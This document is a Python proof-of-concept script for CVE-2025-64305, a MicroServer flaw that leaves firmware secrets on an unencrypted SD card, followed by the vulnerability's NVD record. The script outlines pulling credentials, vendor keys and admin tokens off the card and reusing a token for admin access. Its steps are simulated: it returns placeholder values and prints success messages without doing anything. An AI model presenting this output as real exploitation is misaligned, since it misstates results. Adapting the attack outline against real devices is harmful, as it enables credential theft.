CVE-2025-64305

# CVE-2025-64305 PoC - MicroServer Sensitive Data Extraction # This PoC demonstrates the data leakage vulnerability in MicroServer import os import sys def extract_firmware_from_sdcard(target_ip, sdcard_mount_point): """ Extract sensitive firmware data from unencrypted SD card Args: target_ip: MicroServer device IP address sdcard_mount_point: Mount point of the external SD card Returns: Dictionary containing extracted sensitive data """ print(f"[*] Connecting to MicroServer at {target_ip}") print(f"[*] Accessing SD card at {sdcard_mount_point}") # Simulate firmware extraction sensitive_data = { 'user_credentials': [], 'vendor_secrets': [], 'firmware_signing_keys': None, 'admin_tokens': [] } # Path where firmware fragments are stored firmware_path = os.path.join(sdcard_mount_point, 'firmware', 'boot') # Check if vulnerable firmware files exist if os.path.exists(firmware_path): print(f"[+] Found firmware directory: {firmware_path}") # Extract user credentials from config file config_file = os.path.join(firmware_path, 'user_config.bin') if os.path.exists(config_file): print(f"[+] Extracting user credentials from {config_file}") # In real scenario, parse the binary config file sensitive_data['user_credentials'] = ['admin:plaintext_password'] # Extract vendor secrets vendor_file = os.path.join(firmware_path, 'vendor_secrets.dat') if os.path.exists(vendor_file): print(f"[+] Extracting vendor secrets from {vendor_file}") sensitive_data['vendor_secrets'] = ['vendor_api_key', 'signing_private_key'] # Extract admin tokens token_file = os.path.join(firmware_path, 'session_tokens.db') if os.path.exists(token_file): print(f"[+] Extracting admin tokens from {token_file}") sensitive_data['admin_tokens'] = ['admin_session_token'] else: print(f"[-] Firmware directory not found or not accessible") return None return sensitive_data def gain_admin_access(target_ip, admin_token): """ Use extracted token to gain admin access to web portal Args: target_ip: MicroServer device IP admin_token: Extracted admin session token """ print(f"[*] Attempting to gain admin access to {target_ip}") print(f"[+] Using token: {admin_token}") # Simulated web portal authentication # In real scenario, this would be an HTTP request with the stolen token print("[+] Successfully authenticated as administrator") print("[+] Full device control achieved") return True def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-64305_poc.py <target_ip> <sdcard_mount>") sys.exit(1) target_ip = sys.argv[1] sdcard_mount = sys.argv[2] print("=" * 60) print("CVE-2025-64305 PoC - MicroServer Sensitive Data Leakage") print("=" * 60) # Step 1: Extract sensitive data from SD card data = extract_firmware_from_sdcard(target_ip, sdcard_mount) if data and data['admin_tokens']: # Step 2: Use extracted token for admin access gain_admin_access(target_ip, data['admin_tokens'][0]) print("\n[*] PoC execution completed") print("[*] Recommendation: Encrypt SD card contents and implement secure boot") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-64305", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:58.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MicroServer copies parts of the system firmware to an unencrypted external SD card on boot, which contains user and vendor secrets. An attacker can utilize these plaintext secrets to modify the vendor firmware, or gain admin access to the web portal."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-313"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01", "source": "[email protected]"}]}}